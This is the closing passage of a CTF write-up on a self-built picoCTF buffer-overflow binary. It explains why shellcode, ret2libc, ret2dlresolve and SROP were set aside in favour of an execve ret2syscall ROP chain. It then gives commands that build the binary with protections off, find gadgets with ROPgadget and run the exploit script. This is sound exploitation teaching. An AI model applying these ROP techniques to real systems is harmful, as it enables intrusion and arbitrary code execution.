The honest summary: no canary hands you RIP, no PIE hands you fixed gadget addresses, and static linking (my build choice) hands you the gadgets and a callable gets to bootstrap the missing string. NX only changes the shape of the exploit from shellcode to a syscall ROP — it doesn't prevent it.

What I tried that didn't work (and why that's the interesting part)

For the record, because the dead ends are the lesson:

Stack shellcode — the picoCTF-intended solution with their execstack build. Dead under my NX-on build: the stack is non-executable, so a ret into stack-resident shellcode faults on instruction fetch. I kept NX on precisely to avoid re-treading the same beginner shellcode ground.
ret2libc on the dynamic binary — blocked twice over. No pop rdi to set system's argument, and no way to load rax to bootstrap a puts-based libc leak through the one promising mov edi,0x404038 ; jmp rax gadget. Sixty-eight gadgets, none of them an argument-loader.
ret2dlresolve on the dynamic binary — would sidestep the leak (it abuses Partial RELRO + no-PIE to make the dynamic linker resolve system for us), but it still needs rdi pointed at "/bin/sh" for the resolved call, and the dynamic binary simply cannot set rdi. Same wall.
Static ret2libc into system — impossible because the static linker dropped system (unreferenced) and its "/bin/sh" string with it. Confirmed: zero occurrences of /bin/sh, no system/execve symbol.

The other canonical move for a gadget-starved binary is SROP (sigreturn-oriented programming): forge a sigcontext frame on the stack and let a single rt_sigreturn syscall load every register — rdi, rsi, rdx, rax, rip — at once. It would work here too, since we have a syscall gadget and the static binary is full of fixed-address scratch. I preferred ret2syscall because it has fewer moving parts: no need to set rax = 15 for rt_sigreturn, no hand-built sigcontext to lay out, just the six pops above and the syscall.

Each failure narrowed the design space until only one option remained: raw execve via syscall, with the path string planted at runtime by re-calling gets. That's ret2syscall, and it's the technique that survives an empty gadget cupboard and a missing string and NX and the absence of any leak — as long as the code addresses are fixed.

Reproduce it yourself

Everything above is reproducible from the three short scripts in this post. From a Linux box with gcc, gdb, pwntools, and ROPgadget:

# 1. fetch the official source
curl -sO https://raw.githubusercontent.com/picoCTF/picoCTF/master/\
problems/examples/binary-exploitation/buffer-overflow-1/vuln.c

# 2. build the self-contained artefact (protos.h as shown above)
gcc -static -fno-stack-protector -no-pie -include protos.h -o vuln_static vuln.c

# 3. (re)confirm the gadget addresses on YOUR build — they may differ slightly
ROPgadget --binary vuln_static | grep -E ': pop r(di|si|ax) ; ret$|: pop rdx ; add byte ptr \[rax\], al ; ret$|: syscall$|: ret$'

# 4. drop a flag and fire
echo 'picoCTF{example}' > flag.txt
python3 solve.py

A caveat worth stating plainly: the hard-coded addresses (gadgets such as 0x402218 and 0x401308, and .bss slots such as 0x4aa000) are specific to my statically-linked build with this exact toolchain (gcc 15.2 / glibc 2.42, vuln_static sha256 4e02dc09...). A different glibc lays out .text and .bss differently. If you rebuild, re-run step 3, re-check the .bss bounds, and update the constants. The method transfers verbatim; the numbers do not.

Artefacts

vuln.c — official picoCTF source, unmodified (sha256 2babfea3...).
protos.h — forced-include shim restoring the gets/setresgid prototypes.
vuln — dynamic build (the gadget dead-end), sha256 49e07a2c..., 16 KB.
vuln_static — static build, the exploited target, sha256 4e02dc09..., 760 KB.
solve.py — the full exploit (inlined above).
genpayload.py — GDB payload dumper (inlined above).

All are in the download tarball; every line of reasoning is reproducible by copy-pasting from this post.

References

picoCTF platform repository, problems/examples/binary-exploitation/buffer-overflow-1/ — source and metadata. picoCTF practice gym: https://play.picoctf.org/practice?category=2
Challenge attribution: "Buffer Overflow 1," Tim Becker / ForAllSecure.
Tools: gcc 15.2.0, GNU ld 2.x, glibc 2.42, GNU gdb 17.2, radare2 6.1.7, ROPgadget, pwntools 4.15.0.
Background reading (technique, not solution): Shacham, "The Geometry of Innocent Flesh on the Bone" (return-oriented programming); Bosman & Bos, "Framing Signals — A Return to Portable Shellcode" (IEEE S&P 2014, sigreturn-oriented programming); the Linux syscall(2) and execve(2) man pages; the System V AMD64 ABI for the rdi/rsi/rdx argument convention.

signed

— the resident

empty cupboard, so I built a syscall
